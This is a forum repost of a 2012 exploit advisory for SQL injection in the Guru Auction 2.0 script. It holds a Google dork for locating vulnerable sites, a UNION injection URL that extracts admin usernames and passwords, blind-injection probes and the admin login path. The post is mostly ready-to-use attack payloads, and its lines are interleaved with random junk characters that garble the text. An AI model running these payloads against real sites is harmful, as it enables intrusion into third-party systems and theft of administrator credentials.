中国网络渗透测试联盟

标题: Guru Auction 2.0多重sql注射 [打印本页]

作者: admin    时间: 2012-12-31 09:24
标题: Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
! u" G; x& `3 |7 L. E+ N- k' e9 v1 Q) J' T$ y& t, c# U1 Q9 i
作者     : v3n0m
' M" z8 M. l. b8 p- ?: O应用 : Guru Auction 2.0
7 M! V1 T. ^! e5 X8 @/ w+ xPrice       : $49& G$ Y, N2 i6 U5 z
Vendor      : http://www.guruscript.com/
* q0 f6 R2 b( ^/ v6 `# \6 L2 {Google Dork : inurl:subcat.php?cate_id=: f7 m& B3 e: ]2 f3 q
) m6 O4 m, P' F' y) E
SQLi p0c:. c& [+ l. r1 \+ g8 @  }4 I
~~~~~~~~~~
; @. |9 I# L* {% |* S  ]http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--+ K/ X! v' y! T2 d* e

% F% Z; G8 p# q) O" [ ( t; ^% Z! J- y! ^; w
盲注 p0c:( {% F8 O. V) n' p  f1 d! r, ]
~~~~~~~~~~, b/ r% F8 h6 Y* U6 g) F! i
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true( |% B9 |7 D6 W. e& t
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false* ~3 z* Z$ k0 D

$ T* J5 x4 F. R2 r8 P管理登录入口:3 j: |2 c3 E- w0 ?* I# \
~~~~~~~~~~
9 O) B2 |6 o; ehttp://domain.tld/[path]/admin/, h& @; m3 P9 r  I  ^" g4 f





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2